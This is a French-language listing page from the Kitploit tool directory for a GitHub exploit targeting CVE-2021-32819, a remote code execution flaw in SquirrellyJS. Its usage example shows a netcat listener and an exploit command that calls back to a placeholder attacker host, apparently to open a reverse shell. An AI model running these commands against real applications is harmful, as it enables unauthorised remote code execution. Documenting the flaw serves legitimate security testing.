Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-32819 — SquirrellyJS mélange des données de modèle pures avec les options de configuration du moteur via l'API de rendu Express. En écrasant les options de configuration internes, une exécution de code à distance peut être déclenchée dans les applications en aval. | Kitploit
Outils/GitHubGitHub/abady0x1/cve-2021-32819
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebOutil d'Accès à Distance
GitHubabady0x1/cve-2021-32819

CVE-2021-32819

SquirrellyJS mélange des données de modèle pures avec les options de configuration du moteur via l'API de rendu Express. En écrasant les options de configuration internes, une exécution de code à distance peut être déclenchée dans les applications en aval.

Voir le dépôt
10111il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-32819

CVE-2021-32819 : SquirrellyJS mélange les données de template pures avec les options de configuration du moteur via l'API de rendu Express. En écrasant les options de configuration internes, une exécution de code à distance peut être déclenchée dans les applications en aval.

Source

https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/

Analyse

https://blog.diefunction.io/vulnerabilities/ghsl-2021-023

squirrelly

v8.0.0 >= v8.0.8 Exécution de code à distance

Environnement

Ubuntu 20.04.1

Exemple

nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443

Preuve de concept

Télécharger l’outil